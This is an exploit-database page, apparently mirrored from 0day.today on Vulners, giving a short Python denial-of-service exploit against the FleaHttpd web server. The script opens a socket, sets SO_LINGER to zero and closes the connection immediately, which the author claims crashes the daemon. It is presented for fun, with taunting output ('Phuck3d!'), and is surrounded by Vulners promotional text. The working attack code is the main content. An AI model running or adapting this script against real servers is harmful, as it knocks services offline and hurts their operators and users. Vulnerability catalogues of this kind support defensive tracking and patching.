Lucene search
K

FleaHttpd Remote Denial Of Service Exploit

🗓️ 15 Nov 2011 00:00:00Reported by condisType 
zdt
 zdt
🔗 0day.today👁 17 Views

FleaHttpd Remote Denial Of Service exploit by condis, Faster than Apache2 in certain conditions

Code
#!/usr/bin/python
 
"""
 
FleaHttpd Remote Denial Of Service Exploit
by condis
 
"FleaHttpd is a http daemon written from scratch in C. When working as a
static file server, data show that under certain condition, fleahttpd's
speed for static file retrieving can be three times faster than Apache2"
 
project site (source): http://code.google.com/p/fleahttpd/source/browse/trunk/fleahttpd.c
Tested on: Linux Debian
 
Just 4 fun :x
 
"""
 
import sys, socket, struct
 
host = '127.0.0.1'
port = 80
 
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
    sock.connect((host, port))
    sock.close()
    print "Phuck3d!"
 
except:
    print "whOoPs?!"



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2011 00:00Current
7High risk
Vulners AI Score7
17